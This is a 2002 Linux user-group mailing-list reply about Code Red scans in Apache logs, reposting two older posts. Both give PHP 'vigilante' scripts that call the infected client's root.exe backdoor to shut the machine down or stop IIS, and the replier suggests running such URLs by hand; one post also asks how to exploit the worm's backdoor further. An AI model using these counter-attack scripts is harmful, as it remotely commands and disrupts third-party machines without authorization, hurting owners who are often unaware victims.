[NTLUG:Discuss] Unusual httpd logs (scripts attached)

Richard Geoffrion ntlug at rain.lewisville.tx.us
Sat Jun 15 14:25:21 CDT 2002 

----- Original Message -----
From: "david ross" <david at rawcreations.net>
To: <discuss at ntlug.org>
Sent: Wednesday, June 12, 2002 5:36 PM
Subject: [NTLUG:Discuss] Unusual httpd logs


> ok i know i said unusual but its really not. what i'm looking for is a
script
> i saw posted here for shutting down a remote machine that keeps filling my
> logs with the same GET request.
> <snip>
> [Wed Jun 12 11:09:30 2002] [error] [client 12.237.176.176] File does not
> exist: /html/scripts/root.exe
> [Wed Jun 12 11:09:30 2002] [error] [client 12.237.176.176] File does not
> exist: /html/MSADC/root.exe
> [Wed Jun 12 14:29:16 2002] [error] [client 12.237.176.176] File does not
> exist: /html/scripts/root.exe
>
> how can i stop this? i added this IP to hosts.deny but that didn't work
and
> i'm not familiar at all with ipchains.
> TIA  David
>

I think you are looking for THIS former post..

[former post]
In a properly configured apache setup and php setup with track vars on you
could also use something like the following.

<?php
$remoteserver = fopen("http://" . $REMOTE_ADDR .
"/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5", "r");
$response = fread($remoteserver,0);
mail($SERVER_ADMIN, "Code Red II Attack", "Remote IP:
$REMOTE_ADDR\n\n\nServer Name : $SERVER_NAME\n\n\nServer Port :
$SERVER_PORT\n\n\nRequest URL : $REQUEST_URI\n\n\nResponse : $response",
"From: coderedkiller@$SERVER_NAME\n");
?>

This code should shut the machine down.  Power down on most systems.  Plus
it sends you a nice little e-mail you can use to track all these lamos who
after a month and a week still run around with their pants down.  The only
thing I'm not sure of in the code is the response.  With the size set to 0 I
figured it would just run the specified command take the result and die
sending me the response so I would know if it ran right or not.  It does not
seem to be doing that so if you wanted you could easily skip that step or
see if you can make it work and please let me know how you did it.

[/former post]


-----------or this one----------

[another former post]
Code Red hits continue to hit my web server in a fairly constant stream.
Obviously no new variants are running and so the latest version continues to
be the one.  As we all know, @Home users have fallen victim to the
mass-ignorance of its ubiquitous Microsoft users.  These "install all
options and let all defaults fly" users are blissfully unaware of their role
as the target of blame for a loss in quality of service for a great number
of @Home users.

*I* am an @Home user and I currently still have "normal" access to the
internet both incoming and outgoing.  I would like to protect my "internet"
by running a counter-attack.  I have been running a "default.ida" file that
is actually a PHP4 script (apparently) designed to shut down some services
but that does not shut down the Code Red process(es).

With this, I am soliciting for the most effective anti-code-red code I can
install onto a Linux/Apache/PHP4 server.  I am unashamed to host such code
as such a vigilante move is the only forseeable means by which we can
protect our own interests.  I'm completely unhappy with the casual ignorance
of most MS users (ignorance by design) and the blanket method @Home was
forced into [permanantly?] applying against its users.

The worst part is that @Home's move, while protecting many users against
infection, protects infected users from disinfection!  How is that for
irony?  So the infected and protected users remain free to transmit their
flags of stupidity free from the backlash of hackers and vigilante code.

Here is my vigilante code:

---
default.ida:
<?
        $command  = "lynx -source http://";
        $command .= $REMOTE_ADDR;
        $command .= "/scripts/root.exe?/c+iisreset+/stop";

        $retvalu  = exec($command);
?>
---

Simple, yet [hopefully] effective.  I know that there are methods at PHP's
disposal to perform the same function(s) for which "lynx" is being used.
But simplicity was part the goal in this case.  However, for reasons stated
above, I don't believe I'm making the most of the situation here.

I know that "Code Red" is an old issue, but it's actually very much alive
and as far as I'm concerned, a valid and active one.

Now, I know that in addition to the port 80 vulnerability, the newest breed
of Code Red also opens a backdoor of some type.  My question is if this
backdoor can be exploited in spite of the blocked port 80?  And if so, how?

[/another former post]

Of course you can look back into the NTLUG Discuss August 2001 archives for
all of the debates on the ethics of all of this.

I wonder.....for those who do NOT have PHP configured and running, I suppose
it would be posible to manually execute a specific URL on a case by case
basis....hmmm....  Well if the admin of the offending user keeps getting his
server shutdown then maybe he'll go looking for the reason and find 'the
problem'.


Hope this helps.

-Richard

More information about the Discuss mailing list